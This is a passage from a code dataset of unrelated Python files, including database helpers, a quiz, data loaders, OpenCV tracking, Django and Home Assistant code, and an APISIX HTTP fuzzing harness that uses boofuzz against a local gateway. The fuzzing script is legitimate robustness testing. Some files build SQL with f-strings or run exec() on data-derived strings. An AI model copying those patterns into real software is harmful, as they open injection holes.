beeflow.common.config_driver import BeeConfig as bc\nbc.init()\n\n\ndef connect_db(module, db_path):\n \"\"\"Return a DB object.\"\"\"\n db = module.open_db(db_path)\n return db\n\n\ndef create_connection(db_file):\n \"\"\"Create a new connection with the workflow database.\"\"\"\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n return conn\n except Error as error:\n print(error)\n return conn\n\n\ndef create_table(db_file, stmt):\n \"\"\"Create a new table in the database.\"\"\"\n with create_connection(db_file) as conn:\n try:\n cursor = conn.cursor()\n cursor.execute(stmt)\n except Error as error:\n print(error)\n\n\ndef run(db_file, stmt, params=None):\n \"\"\"Run the sql statement on the database. Doesn't return anything.\"\"\"\n with create_connection(db_file) as conn:\n try:\n cursor = conn.cursor()\n if params:\n cursor.execute(stmt, params)\n else:\n cursor.execute(stmt)\n conn.commit()\n except Error as error:\n print(error)\n\n\ndef getone(db_file, stmt, params=None):\n \"\"\"Run the sql statement on the database and return the result.\"\"\"\n with create_connection(db_file) as conn:\n try:\n cursor = conn.cursor()\n if params:\n cursor.execute(stmt, params)\n else:\n cursor.execute(stmt)\n result = cursor.fetchone()\n except Error:\n result = None\n return result\n\n\ndef getall(db_file, stmt, params=None):\n \"\"\"Run the sql statement on the database and return the result.\"\"\"\n with create_connection(db_file) as conn:\n try:\n cursor = conn.cursor()\n if params:\n cursor.execute(stmt, params)\n else:\n cursor.execute(stmt)\n result = cursor.fetchall()\n except Error:\n result = None\n return result\n\n\ndef table_exists(db_file, table_name):\n \"\"\"Return true if a table exists and false if not.\"\"\"\n stmt = f\"SELECT name FROM sqlite_master WHERE type='table' AND name='{table_name}';\"\n result = getall(db_file, stmt)\n return len(result) != 0\n\n\ndef get_table_length(db_file, table):\n \"\"\"Return the number of rows in a table.\"\"\"\n stmt = f\"SELECT COUNT(*) from {table}\"\n result = getall(db_file, stmt)\n rows = result[0][0]\n return rows\n","sub_path":"beeflow/common/db/bdb.py","file_name":"bdb.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"159888904","text":"# -*- coding:utf-8 -*-\nfrom aistudio_notebook.component_drill.drill.base_drill import BaseDrill\nfrom aistudio_notebook.component_drill import drill\nimport inspect\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('-a', help='get/update', default='get', required=True)\nparser.add_argument('-c', help='code_name')\nparser.add_argument('-n', help='node_instance_id', required=True)\nparser.add_argument('-d', help='local_dir', required=True)\nparser.add_argument('-o', help='output')\nargs = parser.parse_args()\n\n\ndef get_engine_type(node_instance_id):\n return node_instance_id\n\n\ndef main():\n print(args.a)\n print(args.c)\n print(args.n)\n print(args.d)\n print(args.o)\n code_name = args.c\n node_instance_id = args.n\n local_dir = args.d\n # 获取drill\n drill_ = BaseDrill()\n\n code_names = {\n obj.code_name: obj for name, obj in inspect.getmembers(drill) if inspect.isclass(obj) and obj.code_name\n }\n engine_types = {\n obj.engine_type: obj for name, obj in inspect.getmembers(drill) if inspect.isclass(obj) and obj.engine_type\n }\n if code_name and code_name in code_names:\n drill_ = code_names.get(code_name)()\n else:\n engine_type = get_engine_type(node_instance_id=node_instance_id)\n print('haha %s' % engine_type)\n if engine_type and int(engine_type) in engine_types:\n print(engine_types.get(int(engine_type))())\n drill_ = engine_types.get(int(engine_type))()\n print(code_names)\n print(engine_types)\n\n getattr(drill_, args.a)(node_instance_id=node_instance_id, local_dir=local_dir)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"aistudio_notebook/component_drill/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"52222573","text":"import json\r\nimport requests\r\nimport pprint\r\nimport html\r\nimport random\r\nansnum=1\r\nurl=\"https://opentdb.com/api.php?amount=10&category=10&difficulty=easy&type=multiple\"\r\nend=\"\"\r\nscore=0\r\n\r\nwhile end != \"quit\":\r\n r=requests.get(url)\r\n if (r.status_code != 200):\r\n print(\"error in connection\")\r\n else:\r\n \r\n data = json.loads(r.text)\r\n qus = data['results'][0]['question']\r\n ans = data['results'][0]['incorrect_answers']\r\n corr_ans = data['results'][0]['correct_answer']\r\n ans.append(corr_ans)\r\n random.shuffle(ans)\r\n\r\n print(html.unescape(qus) +\"\\n\")\r\n \r\n for ansa in ans:\r\n print(str(ansnum) + \"-\" +html.unescape(ansa) + \"\\n\")\r\n ansnum +=1\r\n usrans=input(\"Type the correct answer \")\r\n a=int(usrans)\r\n if ((a <= 0) and (a < 4)):\r\n print(\"enter a valide number \")\r\n continue\r\n else:\r\n usrans=ans[int(usrans)-1]\r\n\r\n if usrans == corr_ans:\r\n print(\"you answerd correctly \")\r\n ansnum=1\r\n score +=1\r\n print('your score is '+ str(score))\r\n else:\r\n print(\"sorry answer is wrong \")\r\n ansnum=1\r\n print('your score is'+ str(score))\r\n end = input(\"\\n press enter to play again enter 'quit' to exit. \")\r\nprint(\"thanks for playing\") \r\n","sub_path":"quiz.py","file_name":"quiz.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"356415185","text":"import scikits.audiolab as audiolab\nimport scipy, os\nfrom google.cloud import storage\nfrom firebase import firebase\ndatabase = firebase.FirebaseApplication('https://sabrina-415a1.firebaseio.com')\nclient = storage.Client()\nbucket = client.get_bucket('sabrina-415a1.appspot.com')\nos.chdir(\"Documents/Sabrina - Diana\")\nchars = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\nresults = database.get('lang/en', None)\nfor sentence in results.values():\n sentence = sentence.replace(\"!\", \"\").replace(\", \", \" \").replace(\". \", \" \").replace(\".\", \"\").lower()\n usedChars = []\n current = 0\n words = sentence.split(\" \")\n try:\n for word in words:\n exec(chars[current]+\", fs, enc = audiolab.wavread(\"+'\"'+word+'.wav\"'+\")\")\n usedChars += chars[current]\n current += 1\n exec(\"stack = scipy.vstack(\"+str(usedChars).replace(\"[\", \"(\").replace(\"]\", \")\").replace(\"'\", \"\")+\")\")\n audiolab.wavwrite(stack, sentence+\".wav\", fs, enc)\n except:\n continue\n blob = bucket.blob(sentence+\".wav\")\n blob.upload_from_filename(sentence+\".wav\")\n","sub_path":"voice.py","file_name":"voice.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"291709474","text":"import re\nfrom django.db import transaction\nfrom worlds import models\nfrom utils import traveller\n\n\n\ndef sanitize_coords(coords):\n if coords == \"\":\n return \"\"\n return (\"0000\" + str(coords))[-4:]\n\n\n\nclass PersistenceError(Exception):\n pass\n\nclass SectorMismatch(PersistenceError):\n pass\n\nclass AllegianceCache:\n def __init__(self, galaxy):\n self.cache = {}\n self.galaxy = galaxy\n for allegiance in galaxy.allegiances.all():\n self.cache[allegiance.code] = allegiance\n\n def populate(self, code, name):\n if code in self.cache:\n return None\n alleg = models.Allegiance(galaxy=self.galaxy, code=code, name=name)\n alleg.save()\n self.cache[code] = alleg\n return alleg\n\n def lookup(self, code):\n if not code:\n return None\n if code in self.cache:\n return self.cache[code]\n return self.populate(code, \"Unknown allegiance '%s'\" % code)\n\n def __str__(self):\n return str(self.cache)\n\nclass RouteTypeCache:\n def __init__(self, galaxy):\n self.cache = {}\n self.galaxy = galaxy\n for route_type in galaxy.route_types.all():\n self.cache[route_type.code] = route_type\n\n def lookup(self, code):\n if not code:\n return None\n if code in self.cache:\n return self.cache[code]\n route_type = models.RouteType(galaxy=self.galaxy, code=code)\n route_type.save()\n self.cache[code] = route_type\n return route_type\n\n def __str__(self):\n return str(self.cache)\n\nclass Loader:\n def __init__(self, galaxy, *args, **kwargs):\n if isinstance(galaxy, str):\n self.galaxy = models.Galaxy.objects.get(slug=galaxy)\n else:\n self.galaxy = galaxy\n self.cache = AllegianceCache(self.galaxy)\n self.rt_cache = RouteTypeCache(self.galaxy)\n\n @transaction.atomic\n def load_worlds(self, sector, world_data, strict=False):\n warnings = []\n ignored_codes = []\n def add_warning(msg):\n if strict:\n raise PersistenceError(msg)\n else:\n warnings.append(msg)\n if isinstance(sector, str):\n sector = models.Sector.objects.get(galaxy=self.galaxy, slug=sector)\n n_worlds = 0\n for line in world_data:\n n_worlds += 1\n coords = sanitize_coords(line['Hex'])\n line_sector = line.get('Sector')\n if line_sector and line_sector.lower() != sector.slug:\n raise SectorMismatch(\n \"World %s sector %s does not match metadata sector %s\"\n % (coords, line_sector, sector.slug)\n )\n remarks = line['Remarks'].split()\n owners = list(filter((\n lambda x: re.fullmatch(\n r'O:\\d{4}', x)\n ), remarks))\n if len(owners) > 1:\n add_warning(\"more than one owner for %s\" % coords)\n specials = list(filter((\n lambda x: re.fullmatch(\n r'A[bn]|C[psx]|Mr|Px|Re|Rs.', x)\n ), remarks))\n known_codes = list(filter((\n lambda x: re.fullmatch(\n r'Ag|As|Ba|De|Fl|Ga|He|Hi|Ic|In|Lo|Ni|Na|Po|Ri|Va|Wa', x)\n ), remarks))\n forgettable_codes = list(filter((\n lambda x: re.fullmatch(\n r'Pa|Di|Oc|Ph|Pi|Pr|Fr|Ho|Co|Lk|Tr|Tu|Tz|Fa|Mi|Pe|Cy|'\n r'Sa|Fo|Pz|Da', x)\n ), remarks))\n if (len(specials) + len(owners) + len(known_codes)\n + len(forgettable_codes) < len(remarks)):\n ignored_codes.append({\n \"hex\": coords,\n \"codes\": list(filter((lambda x: x not in specials\n and x not in owners and x not in known_codes\n and x not in forgettable_codes), remarks))\n })\n models.World(\n name=line['Name'],\n sector=sector,\n coords=coords,\n uwp=line['UWP'],\n bases=traveller.bases_t5_to_ct(line['Bases']),\n remarks=\" \".join(specials),\n owner=owners[0][2:] if owners else \"\",\n travel_zone=line['Zone'],\n pbg=line['PBG'],\n allegiance=self.cache.lookup(line.get('Allegiance')),\n ).save()\n return {\n \"warnings\": warnings,\n \"ignored_codes\": ignored_codes,\n \"worlds\": n_worlds,\n }\n\n @transaction.atomic\n def load_metadata(self, metadata, strict=False):\n warnings = []\n def add_warning(msg):\n if strict:\n raise PersistenceError(msg)\n else:\n warnings.append(msg)\n sector = models.Sector(\n name=metadata['Names'][0]['Text'],\n galaxy=self.galaxy,\n slug=metadata['Abbreviation'].lower(),\n x_offset=int(metadata['X']),\n y_offset=int(metadata['Y']),\n )\n sector.save()\n for subsector in metadata.get('Subsectors', []):\n models.Subsector(\n sector=sector,\n name=subsector['Name'],\n letter=subsector['Index'],\n ).save()\n n_allegiances = 0\n n_allegiances_added = 0\n for allegiance in metadata.get('Allegiances', []):\n n_allegiances += 1\n if self.cache.populate(allegiance['Code'], allegiance['Name']):\n n_allegiances_added += 1\n n_borders = 0\n for border in metadata.get('Borders', []):\n n_borders += 1\n allegiance = self.cache.lookup(border.get('Allegiance'))\n color = border.get('Color')\n if allegiance and color:\n current_color = allegiance.border_color\n if current_color:\n if current_color != color:\n add_warning(\n \"new border color %s for allegiance %s not saved\"\n % (color, allegiance.code))\n else:\n allegiance.border_color = color\n allegiance.save()\n models.Border(\n sector=sector,\n allegiance=allegiance,\n wrap_label=(border.get('WrapLabel', \"\") == \"true\"),\n show_label=not (border.get('ShowLabel', \"\") == \"false\"),\n label_position=sanitize_coords(border.get('LabelPosition', \"\")),\n label_override=border.get('Label', \"\"),\n data=border['Path'],\n ).save()\n n_routes = 0\n n_routes_added = 0\n for route in metadata.get('Routes', []):\n n_routes += 1\n allegiance = self.cache.lookup(route.get('Allegiance'))\n route_type = self.rt_cache.lookup(route.get('Type'))\n color = route.get('Color')\n if color:\n if allegiance:\n current_color = allegiance.route_color\n if current_color:\n if current_color != color:\n add_warning(\n \"new route color %s for allegiance %s not saved\"\n % (color, allegiance.code))\n else:\n allegiance.route_color = color\n allegiance.save()\n elif route_type:\n current_color = route_type.color\n if current_color:\n if current_color != color:\n add_warning(\n \"new color %s for route type %s not saved\"\n % (color, route_type.code))\n else:\n route_type.color = color\n route_type.style = route.get('Style', \"\").lower()\n route_type.save()\n start_sector = sector.offset(\n int(route.get('StartOffsetX', 0)),\n int(route.get('StartOffsetY', 0)),\n )\n end_sector = sector.offset(\n int(route.get('EndOffsetX', 0)),\n int(route.get('EndOffsetY', 0)),\n )\n if start_sector and end_sector:\n n_routes_added += 1\n models.Route(\n start_sector=start_sector,\n end_sector=end_sector,\n allegiance=allegiance,\n route_type=route_type,\n start_hex=sanitize_coords(route['Start']),\n end_hex=sanitize_coords(route['End']),\n ).save()\n n_labels = 0\n for label in metadata.get('Labels', []):\n n_labels += 1\n models.Label(\n sector=sector,\n coords=sanitize_coords(label['Hex']),\n color=label['Color'],\n text=label['Text'],\n ).save()\n return {\n \"sector\": sector,\n \"warnings\": warnings,\n \"allegiances\": n_allegiances,\n \"allegiances_added\": n_allegiances_added,\n \"borders\": n_borders,\n \"routes\": n_routes,\n \"routes_added\": n_routes_added,\n \"labels\": n_labels,\n }\n\n @transaction.atomic\n def load_sector(self, metadata, world_data, strict=False):\n result_1 = self.load_metadata(metadata, strict=strict)\n result_2 = self.load_worlds(result_1.pop('sector'), world_data,\n strict=strict)\n result_1['warnings'] += result_2.pop('warnings')\n result_1.update(result_2)\n return result_1\n","sub_path":"worlds/persist.py","file_name":"persist.py","file_ext":"py","file_size_in_byte":9873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"571102361","text":"# -*- coding: utf-8 -*-\n\n'''\nCV_TESTS\nSHUCHEN\n\n2018.01.26\n - openCV video capturing tests\n\n2018.03.03\n - openCV Lucas-Kanade tracking\n - https://docs.opencv.org/3.3.1/d7/d8b/tutorial_py_lucas_kanade.html\n\nDONT LET YOUR DREAMS BE DREAMS!\n'''\n\n#%%\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport utilii\n\nd = '/media/shuchen/ShuData/'\nh = '/media/shuchen/HeckDrive/'\nname = 'cv_tests'\n\n#%% Lucas-Kanade tracking\nindex = 2\nfor index in [9]:#range(5):\n _,y = utilii.splitsample(utilii.getsample(index))\n yimgs = [np.repeat(np.asarray(np.squeeze(\n x.data.cpu().numpy()*255\n )[:,:,np.newaxis], dtype=np.uint8), 3, axis=2)\n for x in y['edges']]\n \n #%\n # params for ShiTomasi corner detection\n feature_params = dict( maxCorners = 100,\n qualityLevel = 0.3,\n minDistance = 7,\n blockSize = 7 )\n \n # Parameters for lucas kanade optical flow\n lk_params = dict( winSize = (15,15),\n maxLevel = 2,\n criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))\n \n # Create some random colors\n color = np.random.randint(0,255,(100,3))\n \n # Take first frame and find corners in it\n old_frame = yimgs[0]\n old_gray = cv2.cvtColor(old_frame, cv2.COLOR_BGR2GRAY)\n p0 = cv2.goodFeaturesToTrack(old_gray, mask=None, **feature_params)\n \n # Create a mask image for drawing purposes\n mask = np.zeros_like(old_frame)\n for j in range(1, len(yimgs)):\n frame = yimgs[j]\n frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n \n # calculate optical flow\n p1, st, err = cv2.calcOpticalFlowPyrLK(old_gray, frame_gray, p0, None, **lk_params)\n \n # Select good points\n good_new = p1[st==1]\n good_old = p0[st==1]\n \n # draw the tracks\n for i,(new,old) in enumerate(zip(good_new,good_old)):\n a,b = new.ravel()\n c,d = old.ravel()\n mask = cv2.line(mask, (a,b),(c,d), color[i].tolist(), 2)\n frame = cv2.circle(frame,(a,b),5,color[i].tolist(),-1)\n img = cv2.add(frame,mask)\n \n #plt.imshow(img, cmap='gray')\n img = cv2.resize(img, dsize=(1280,720), interpolation=cv2.INTER_NEAREST)\n plt.imsave('./%s/%d.%d.png'%(name,index,j), img, format='png', cmap='gray')\n \n # Now update the previous frame and previous points\n old_gray = frame_gray.copy()\n p0 = good_new.reshape(-1,1,2)\n\n#%%\n\n\n\n\n\n\n\n\n\n\n\n\n#%% video capturing\ncap = cv2.VideoCapture(d+'shows/adventure_time_s1-5/'+\n '01.01 - Slumber Party Panic.mp4')\ncap.open(d+'shows/adventure_time_s1-5/'+\n '01.01 - Slumber Party Panic.mp4')\n\n#%%\nret,frame = cap.read()\nplt.imshow(frame)\n\n\n#%%\ncap = cv2.VideoCapture('/media/shuchen/ShuData/shows/attack_on_titan_s1/'+\n'[pseudo] Attack on Titan S01E01 To You, '+\n'Two Thousand Years Later [1080p] [h.265].mkv')\n\n#%%\nx = cv2.imread('/media/shuchen/ShuData/shows/attack_on_titan_s1/Sample/Screenshot 03.png')\nplt.imshow(x)\nplt.show()\n\n#%%\ncap.release()","sub_path":"cv_tests.py","file_name":"cv_tests.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"312125323","text":"class Solution:\n # @param A : integer\n # @return a list of list of integers\n def solve(self, A):\n ans=[[1],[1,1],[1,2,1],[1,3,3,1],[1,4,6,4,1]]\n if A<5:\n return ans[:A]\n for i in range(A-5):\n ans.append([])\n ans[-1].append(1)\n for j in range(len(ans[-2])-1):\n ans[-1].append(ans[-2][j]+ans[-2][j+1])\n ans[-1].append(1)\n return ans\n","sub_path":"PROGRAMMING/InterviewBit/Arrays/pascal-triangle.py","file_name":"pascal-triangle.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"390505873","text":"#! /usr/bin/env python\n\n#\n# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport subprocess\nfrom public import initfuzz, run_test\nfrom boofuzz import s_block, s_delim, s_get, s_group, s_initialize, s_static, s_string\n\ndef create_route():\n command = '''curl http://127.0.0.1:9180/apisix/admin/routes/1 -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d '\n{\n \"uri\": \"/get*\",\n \"methods\": [\"GET\"],\n \"upstream\": {\n \"type\": \"roundrobin\",\n \"nodes\": {\n \"127.0.0.1:6666\": 1\n }\n }\n}'\n '''\n subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n\ndef run():\n session = initfuzz()\n\n s_initialize(name=\"Request\")\n with s_block(\"Request-Line\"):\n s_group(\"Method\", ['GET', 'HEAD', 'POST', 'PUT', 'DELETE', 'CONNECT', 'OPTIONS', 'TRACE', \"PURGE\"])\n s_delim(\" \", name='space-1')\n s_string(\"/get\", name='Request-URI')\n s_delim(\" \", name='space-2')\n s_string('HTTP/1.1', name='HTTP-Version')\n s_static(\"\\r\\n\", name=\"Request-Line-CRLF\")\n s_string(\"Host:\", name=\"Host-Line\")\n s_delim(\" \", name=\"space-3\")\n s_string(\"example.com\", name=\"Host-Line-Value\")\n s_static(\"\\r\\n\", name=\"Host-Line-CRLF\")\n s_string(\"Connection:\", name=\"Connection-Line\")\n s_delim(\" \", name=\"space-4\")\n s_string(\"Keep-Alive\", name=\"Connection-Line-Value\")\n s_static(\"\\r\\n\", name=\"Connection-Line-CRLF\")\n s_string(\"User-Agent:\", name=\"User-Agent-Line\")\n s_delim(\" \", name=\"space-5\")\n s_string(\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1\", name=\"User-Agent-Line-Value\")\n s_static(\"\\r\\n\", name=\"User-Agent-Line-CRLF\")\n\n s_static(\"\\r\\n\", \"Request-CRLF\")\n session.connect(s_get(\"Request\"))\n session.fuzz(max_depth=1)\n\nif __name__ == \"__main__\":\n run_test(create_route,run)\n","sub_path":"t/fuzzing/simpleroute_test.py","file_name":"simpleroute_test.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"571395347","text":"from django.core.management.base import BaseCommand\nfrom ctrs_texts.models import (\n Repository, Manuscript, AbstractedText, EncodedText,\n AbstractedTextType, EncodedTextStatus\n)\nfrom django.utils.text import slugify\nfrom ctrs_texts.utils import get_xml_from_unicode, get_unicode_from_xml\n\n\nclass Command(BaseCommand):\n help = 'CTRS text management toolbox'\n\n def log(self, message, verbosity=1):\n if verbosity <= self.get_verbosity():\n self.stdout.write(message)\n\n def error(self, message):\n self.stderr.write(self.style.ERROR(message))\n\n def get_verbosity(self):\n return self.verbosity\n\n def add_arguments(self, parser):\n parser.add_argument('action', nargs='?', type=str)\n parser.add_argument('options', nargs='*', type=str)\n\n def handle(self, *args, **options):\n action = options['action']\n self.options = options['options']\n self.verbosity = options['verbosity']\n\n valid = False\n\n if action == 'import':\n valid = self.handle_import()\n\n if action == 'delete':\n for m in [\n Repository, Manuscript,\n AbstractedText, EncodedText, AbstractedTextType,\n EncodedTextStatus\n ]:\n m.objects.all().delete()\n valid = True\n\n if action == 'unique':\n valid = self.handle_unique()\n\n if not valid:\n self.show_help()\n else:\n self.log('done')\n\n def handle_import(self):\n '''\n curl\n \"http://localhost:8001/digipal/api/textcontentxml/?@select=*status,id,str,content,*text_content,*item_part,group,group_locus,type,*current_item,locus,shelfmark,*repository,place&@limit=1000\"\n > arch-content.json\n '''\n ret = False\n\n if len(self.options) != 1:\n return ret\n\n ret = True\n\n file_path = self.options.pop(0)\n self.action_import(file_path)\n\n return ret\n\n def action_import(self, input_file):\n data = None\n\n import json\n try:\n with open(input_file, 'rt') as fh:\n data = json.load(fh)\n except Exception as e:\n self.error('%s' % e)\n return False\n\n ret = self.import_json(data)\n\n if ret:\n ret = self.handle_unique()\n\n return ret\n\n def handle_unique(self):\n # get all versions and works\n parents = EncodedText.objects.filter(\n abstracted_text__type__slug__in=['work', 'version']\n ).exclude(\n abstracted_text__short_name__in=['HM1', 'HM2']\n ).order_by(\n 'abstracted_text__type__slug', 'abstracted_text__short_name'\n )\n\n for parent in parents:\n regions, members = parent.get_readings_from_members()\n\n encoded_texts = [\n member.encoded_texts.filter(type=parent.type).first()\n for member in members\n ]\n\n xmls = [\n get_xml_from_unicode(text.content, ishtml=True, add_root=True)\n for text in encoded_texts\n ]\n\n for ri, region in enumerate(regions):\n groups = {}\n for mi, variants in enumerate(region):\n variants['mi'] = mi\n if variants['reading'] not in groups:\n groups[variants['reading']] = []\n groups[variants['reading']].append(variants)\n\n for reading, group in groups.items():\n # print(reading, len(group))\n if len(group) != 1:\n continue\n # print('unique')\n for variant in group:\n el = xmls[variant['mi']].find(\n './/span[@id=\"{}\"]'.format(variant['id']))\n if el is None:\n print(\n 'WARNING: region not found ({} in {})'.format(\n ri, members[variant['mi']].short_name\n )\n )\n continue\n el.attrib['data-copies'] = '1'\n\n for mi, encoded_text in enumerate(encoded_texts):\n encoded_text.content = get_unicode_from_xml(\n xmls[mi], remove_root=True\n )\n # print(encoded_text.abstracted_text.id)\n encoded_text.save()\n\n return True\n\n def import_json(self, data):\n '''\n Imports the text XML and metadata\n from a json file exported from Archetype.\n\n Insert or update.\n Stores archetype record id in .imported_id field\n to permanently keep track of the mapping.\n '''\n ab_types = AbstractedTextType.get_or_create_default_types()\n statuses = {}\n # see delete_unimported_records()\n models_imported_ids = {m: [] for m in [\n Repository, Manuscript, AbstractedText, EncodedText\n ]}\n\n # mapping from itempart id to abstracted text id\n arch_ipid_to_ab_txt = {}\n\n for jtcxml in data['results']:\n self.log(jtcxml['str'], 2)\n jtc = jtcxml['text_content']\n jip = jtc['item_part']\n jci = jip['current_item']\n jrepo = jci['repository']\n\n if jip['type'] is None:\n continue\n ip_type = slugify(jip['type'])\n\n status_name = jtcxml['status']['str']\n status_slug = slugify(status_name)\n status = statuses.get(status_slug, None)\n if status is None:\n status, _ = EncodedTextStatus.objects.get_or_create(\n slug=status_slug,\n defaults={'name': status_name}\n )\n statuses[status_slug] = status\n\n if ip_type in ['manuscript']:\n repo, _ = Repository.update_or_create(\n jrepo['id'], jrepo['place'], jrepo['str']\n )\n models_imported_ids[Repository].append(jrepo['id'])\n ms, _ = Manuscript.update_or_create(\n jci['id'], repo, jci['shelfmark']\n )\n models_imported_ids[Manuscript].append(jci['id'])\n ab_txt, _ = AbstractedText.update_or_create(\n jip['id'], ab_types[ip_type],\n manuscript=ms, locus=jip['locus']\n )\n models_imported_ids[AbstractedText].append(jip['id'])\n else:\n ab_txt, _ = AbstractedText.update_or_create(\n jip['id'], ab_types[ip_type],\n name=jip['str'],\n )\n models_imported_ids[AbstractedText].append(jip['id'])\n\n EncodedText.update_or_create(\n jtc['id'], ab_txt, jtc['type'],\n self.clean_archetype_text_content(jtcxml['content']),\n status\n )\n models_imported_ids[EncodedText].append(jtc['id'])\n\n arch_ipid_to_ab_txt[jip['id']] = ab_txt\n\n # relationship among the abstracted texts\n # ms-text -> version-text -> work-text\n for jtcxml in data['results']:\n jtc = jtcxml['text_content']\n jip = jtc['item_part']\n ab_text = arch_ipid_to_ab_txt.get(jip['id'], None)\n if ab_text:\n ab_text_group = arch_ipid_to_ab_txt.get(\n jip.get('group__id', None), None\n )\n ab_text.group = ab_text_group\n ab_text.short_name = jip.get('group_locus', None)\n ab_text.save()\n\n deleted_count = self.delete_unimported_records(models_imported_ids)\n\n self.log('{} inserted/updated, {} deleted.'.format(\n sum([len(ids) for m, ids in models_imported_ids.items()]),\n deleted_count\n ))\n\n return True\n\n def clean_archetype_text_content(self, content):\n # non-breaking spaces -> normal spaces\n ret = (content or '').replace(' ', '').replace('\\xA0', ' ')\n\n # allow the empty symbol to be styled\n ret = ret.replace('∅', '')\n\n # ac-128: add an empty-region class the spans that only contains an\n # empty symbol\n import re\n ret = re.sub(\n r'(]+data-dpt-type=\"unsettled\"[^>]*)(>\\s*∅\\s*)',\n r'\\1 class=\"empty-region\"\\2',\n ret\n )\n\n # Minor XML transforms\n xml = get_xml_from_unicode(ret, ishtml=True, add_root=True)\n\n counters = {\n 'version': 0,\n 'work': 0,\n }\n\n for region in xml.findall('.//span[@data-dpt-type=\"unsettled\"]'):\n # add data-dpt-group=\"version\" to the v-regions\n region_type = 'work'\n if not region.attrib.get('data-dpt-group', None):\n region_type = 'version'\n region.attrib['data-dpt-group'] = region_type\n\n # assign short id to all regions\n counters[region_type] += 1\n region.attrib['data-rid'] = '{}-{}'.format(\n region_type[0], counters[region_type]\n )\n\n for sn in xml.findall('.//span[@data-dpt=\"sn\"]'):\n # add short if to all sentence number\n sn.attrib['data-rid'] = 's-' + str(sn.text.strip())\n\n ret = get_unicode_from_xml(xml, remove_root=True)\n\n return ret\n\n def delete_unimported_records(self, models_imported_ids):\n '''\n Delete all the records with .imported_id <> None\n which have not been imported by the import command.\n\n models_imported_ids is a dictionary of the form\n {ModelClass: [id1, id2, ...], }\n\n returns number of deleted records.\n '''\n ret = 0\n\n for m, ids in models_imported_ids.items():\n res = m.objects.exclude(imported_id__in=ids).delete()\n if res[0]:\n self.log('Deleted {} {}'.format(res[0], m), 2)\n ret += res[0]\n\n return ret\n\n def show_help(self):\n self.stdout.write('''{}\n\nUsage: ACTION OPTIONS\n\nACTION:\n\n help\n show this help.\n\n import FILE\n import all the text content and metadata from FILE.\n update if the record already exists.\n FILE: a json file obtained from archetype API,\n see inline comment (handle_import)\n\n delete\n delete all the text concent records from the DB\n\n unique\n mark up unique readings in all the texts\n\n'''.format(self.help))\n","sub_path":"ctrs_texts/management/commands/ctrstxt.py","file_name":"ctrstxt.py","file_ext":"py","file_size_in_byte":10661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"580571421","text":"\"\"\"Test SkyBell config flow.\"\"\"\nfrom unittest.mock import patch\n\nfrom aioskybell import exceptions\n\nfrom homeassistant.components.skybell.const import DOMAIN\nfrom homeassistant.config_entries import SOURCE_IMPORT, SOURCE_USER\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.data_entry_flow import FlowResultType\n\nfrom . import CONF_CONFIG_FLOW, _patch_skybell, _patch_skybell_devices\n\nfrom tests.common import MockConfigEntry\n\n\ndef _patch_setup_entry() -> None:\n return patch(\n \"homeassistant.components.skybell.async_setup_entry\",\n return_value=True,\n )\n\n\ndef _patch_setup() -> None:\n return patch(\n \"homeassistant.components.skybell.async_setup\",\n return_value=True,\n )\n\n\nasync def test_flow_user(hass: HomeAssistant) -> None:\n \"\"\"Test that the user step works.\"\"\"\n with _patch_skybell(), _patch_skybell_devices(), _patch_setup_entry(), _patch_setup():\n result = await hass.config_entries.flow.async_init(\n DOMAIN, context={\"source\": SOURCE_USER}\n )\n\n assert result[\"type\"] == FlowResultType.FORM\n assert result[\"step_id\"] == \"user\"\n\n result = await hass.config_entries.flow.async_configure(\n result[\"flow_id\"],\n user_input=CONF_CONFIG_FLOW,\n )\n\n assert result[\"type\"] == FlowResultType.CREATE_ENTRY\n assert result[\"title\"] == \"user\"\n assert result[\"data\"] == CONF_CONFIG_FLOW\n\n\nasync def test_flow_user_already_configured(hass: HomeAssistant) -> None:\n \"\"\"Test user initialized flow with duplicate server.\"\"\"\n entry = MockConfigEntry(\n 